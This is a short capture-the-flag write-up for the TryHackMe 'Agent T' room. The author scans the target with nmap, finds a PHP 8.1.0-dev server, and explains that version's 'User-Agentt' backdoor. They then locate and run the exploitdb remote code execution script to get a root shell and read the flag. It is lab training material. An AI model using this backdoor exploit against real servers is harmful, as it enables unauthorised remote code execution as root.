TryHackMe: Agent T

Scanning & Enumeration


└─$ nmap -A -T4 -F $IP
Starting Nmap 7.92 ( []( ) at 2022-08-30 10:05 EDT
Nmap scan report for
Host is up (0.060s latency).
Not shown: 99 closed tcp ports (conn-refused)
80/tcp open  http    PHP cli server 5.5 or later (PHP 8.1.0-dev)
|_http-title:  Admin Dashboard

A quick Nmap scan reveals that this host only has 1 service running. Apparently a web server of some sort with an exposed administrator dashboard. The header response shows us that it uses PHP 8.1.0-dev.


Searching for this in searchsploit tells us that it has an exploit available, utilzing a built-in backdoor. That is pretty serious!

└─$ searchsploit PHP 8.1.0 dev


Exploit Title                                                                             |  Path


PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution                                        | php/webapps/


Shellcodes: No Results

An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header. The following exploit uses the backdoor to provide a pseudo shell ont the host.

Gaining access

After running the python script and abusing the backdoor exploit, we immediately spawn a root shell. This makes it simple to retrieve the root flag.

└─$ python3 /usr/share/exploitdb/exploits/php/webapps/
Enter the full host url:

Interactive shell is opened on [](
Can't acces tty; job crontol turned off.
$ whoami
$ cat /flag.txt